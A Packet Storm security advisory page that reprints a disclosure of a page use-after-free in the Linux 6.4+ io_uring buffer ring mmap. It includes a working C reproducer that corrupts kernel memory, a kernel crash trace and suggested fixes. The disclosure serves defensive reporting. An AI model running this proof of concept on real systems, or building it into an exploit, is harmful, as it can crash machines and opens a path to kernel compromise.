Security
Headlines
HeadlinesLatestCVEs

Headline

Linux 6.4 io_uring Use-After-Free

Linux versions 6.4 and above suffer from an io_uring page use-after-free vulnerability via buffer ring mmap.

Packet Storm
#vulnerability#ios#mac#google#linux#debian#bios
Linux >=6.4: io_uring: page UAF via buffer ring mmapSince commit c56e022c0a27 (\"io_uring: add support for user mapped providedbuffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate,mmap, and deallocate \"buffer rings\".A \"buffer ring\" can be allocated withio_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocatedwith io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).It can be mapped into userspace using mmap() with offsetIORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MMsubsystem will treat the mapping as a set of opaque page frame numbers notassociated with any corresponding pages; this implies that the calling code isresponsible for ensuring that the mapped memory can not be freed before theuserspace mapping is removed.However, there is no mechanism to ensure this in io_uring: It is possible tojust register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and thenfree the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving freepages mapped into userspace, which is a fairly easily exploitable situation.reproducer:==============================================================#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <string.h>#include <stdio.h>#include <ctype.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})int main(void) {  struct io_uring_params params = {    .flags = IORING_SETUP_NO_SQARRAY  };  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));  printf(\"uring_fd = %d\\", uring_fd);  struct io_uring_buf_reg reg = {    .ring_entries = 1,    .bgid = 0,    .flags = IOU_PBUF_RING_MMAP  };  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));  printf(\"pbuf mapped at %p\\", pbuf_mapping);  struct io_uring_buf_reg unreg = { .bgid = 0 };  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));  while (1) {    memset(pbuf_mapping, 0xaa, 0x1000);    usleep(100000);  }}==============================================================When run on a system with the debug options:    CONFIG_PAGE_TABLE_CHECK=y    CONFIG_PAGE_TABLE_CHECK_ENFORCED=y, this will splat with the following error, when __page_table_check_zero()detects that a page that's being freed is still mapped into userspace:==============================================================------------[ cut here ]------------kernel BUG at mm/page_table_check.c:146!invalid opcode: 0000 [#1] PREEMPT SMP KASANCPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014RIP: 0010:__page_table_check_zero+0x136/0x150Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ffRSP: 0018:ffff888029aa7c70 EFLAGS: 00010202RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13eR10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0PKRU: 55555554Call Trace: <TASK>[...] free_unref_page_prepare+0x282/0x450 free_unref_page+0x45/0x170 __io_remove_buffers.part.0+0x38c/0x3c0 io_unregister_pbuf_ring+0x146/0x1e0[...] __do_sys_io_uring_register+0xa03/0x11c0[...] do_syscall_64+0x43/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76RIP: 0033:0x7f745ef4bf59Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001abRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000 </TASK>Modules linked in:---[ end trace 0000000000000000 ]---==============================================================When run on a system without those options, this reproducer will randomlycorrupt memory and probably on most runs crash the machine.I tried it once and after I tried using some other programs, I got some randomkernel #GP fault.One way to fix this might be to add some mapping counter to`struct io_buffer_list`, and then: - increment that counter in io_uring_validate_mmap_request() for PBUF_RING   mappings - increment that counter in the vm_area_operations ->open() handler - decrement that counter in the vm_area_operations ->close() handler - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?Or alternatively free the io_buffer_list when the counter drops to zero, and letthe counter start at 1.(I'm not sure what the lifetime rules for other accesses to the io_buffer_list'smemory are - it looks like most paths only access the io_buffer_list under somelock? Is the idea that the kernel actually accesses the buffer through userspacepointers, or something like that? I'll have to stare at this some more before Iunderstand it...)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-26.Found by: [email protected]

Packet Storm: Latest News

Red Hat Security Advisory 2024-8690-03